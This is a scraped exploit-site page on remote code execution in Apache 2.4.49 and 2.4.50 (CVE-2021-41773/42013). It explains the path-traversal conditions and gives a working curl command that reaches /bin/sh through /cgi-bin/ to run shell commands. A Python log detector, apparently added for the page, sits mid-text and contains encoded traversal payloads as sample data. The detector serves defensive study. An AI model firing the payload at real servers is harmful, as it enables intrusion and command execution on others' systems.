## https://sploitus.com/exploit?id=0C28A0EC-7162-5D73-BEC9-B034F5392847
## RCE exploit for both Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):

IMHO only "special" setups will be vulnerable to this RCE.\
The same applies to the "arbitrary file read" exploits you have seen.

Both CVEs are essentially the same path-traversal vulnerability (the second one is the incomplete fix for the first).\
Path traversal only works from a mapped URI (e.g. via the "Alias" or "ScriptAlias" Apache directives). DocumentRoot alone is not sufficient.

"/cgi-bin/" is mapped by default (ScriptAlias), which is why it is used before the path-traversal string.\
Besides, ScriptAlias marks all contents of the given directory as executable for Apache (regardless of file extension).
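Because the traversal only matters when it climbs out of a mapped prefix such as the default `/cgi-bin/` ScriptAlias, and because Apache's access log records the request line as received (so the `.%2e` / `.%%32%65` encodings appear undecoded), a detector has to decode the path repeatedly and then count `..` segments relative to the mapping. The following Python is an added example written for this page, not code from the exploit author; the log lines are constructed samples and the set of mapped prefixes is an assumption (only the default `/cgi-bin/` is listed).

```python
import re
from urllib.parse import unquote

# Assumption: only the default ScriptAlias mapping exists. Add any Alias/ScriptAlias
# prefixes from the server's own config here.
MAPPED_PREFIXES = ("/cgi-bin/",)

# Constructed sample access-log lines (combined log format, not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2021:12:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1234
10.0.0.6 - - [05/Oct/2021:12:00:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 56
10.0.0.7 - - [05/Oct/2021:12:00:03 +0000] "GET /cgi-bin/printenv HTTP/1.1" 200 789
10.0.0.8 - - [05/Oct/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 10
"""

REQUEST_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing.

    CVE-2021-42013 abuses a second decoding pass, so a single unquote() is not
    enough: '.%%32%65' -> '.%2e' -> '..'. The round cap avoids looping forever
    on pathological input.
    """
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_mapping(path, prefixes=MAPPED_PREFIXES):
    """True if the fully decoded path climbs above one of the mapped prefixes."""
    decoded = fully_decode(path.split("?", 1)[0])  # ignore the query string
    for prefix in prefixes:
        if not decoded.startswith(prefix):
            continue
        depth = 0
        for segment in decoded[len(prefix):].split("/"):
            if segment == "..":
                depth -= 1
                if depth < 0:          # walked out of the ScriptAlias directory
                    return True
            elif segment not in ("", "."):
                depth += 1
    return False


def find_traversal_requests(log_text):
    """Return (client_ip, decoded_path) for every request that escapes a mapping."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.match(line)
        if m and escapes_mapping(m.group("path")):
            hits.append((m.group("ip"), fully_decode(m.group("path"))))
    return hits


if __name__ == "__main__":
    for ip, path in find_traversal_requests(SAMPLE_LOG):
        print(f"traversal from {ip}: {path}")
```

The check is deliberately tied to the mapped prefix rather than to any `..` anywhere in a URL: as the text above notes, traversal under DocumentRoot alone does not reach the filesystem, so flagging only escapes from Alias/ScriptAlias mappings keeps the false-positive rate down. A `200` status on such a line is the strongest signal; a `403` indicates the `Require all denied` block on `/` did its job.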

### Requirements:
1/ mod_cgi enabled (not default, but easy)\
2/ target binary must be executable (+x; default for /bin/sh)\
3/ Apache permissions granted for /bin or / (not default and difficult/unrealistic)

### Check if server is vulnerable:
`curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'`

### Response from a vulnerable server:
`uid=1(daemon) gid=1(daemon) groups=1(daemon)`